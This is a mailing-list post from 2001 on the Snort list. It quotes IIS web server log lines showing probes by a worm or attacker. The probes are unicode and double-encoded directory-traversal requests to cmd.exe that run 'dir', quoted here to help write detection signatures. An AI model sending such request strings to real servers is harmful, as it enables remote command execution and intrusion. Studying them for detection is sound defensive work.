Snort mailing list archives
Re: WEB-IIS Cmd attack
From: Erek Adams <erek () theadamsfamily net>
Date: Tue, 18 Sep 2001 09:09:24 -0700 (PDT)
On Tue, 18 Sep 2001, cdowns wrote:
> What is the actual signature as I have seen nothing yet on my servers in NH
Give it time, give it time.... What I'm seeing is the following:

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:37 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"

And repeats, ad nauseam. There are some others, but basically still just your standard unicode string attack.

Damn... This one looks worse than CR. *sigh*

-----
Erek Adams
Nifty-Type-Guy
TheAdamsFamily.Net
Current thread:
- WEB-IIS Cmd attack Togan Muftuoglu (Sep 18)
- Re: WEB-IIS Cmd attack R P G (Sep 18)
- Re: WEB-IIS Cmd attack cdowns (Sep 18)
- Re: WEB-IIS Cmd attack Togan Muftuoglu (Sep 18)
- Re: WEB-IIS Cmd attack Erek Adams (Sep 18)
- Re: WEB-IIS Cmd attack cdowns (Sep 18)
- Re: WEB-IIS Cmd attack John Sage (Sep 18)
- <Possible follow-ups>
- Re: WEB-IIS Cmd attack Dr SuSE (Sep 18)
- Re: WEB-IIS Cmd attack R P G (Sep 18)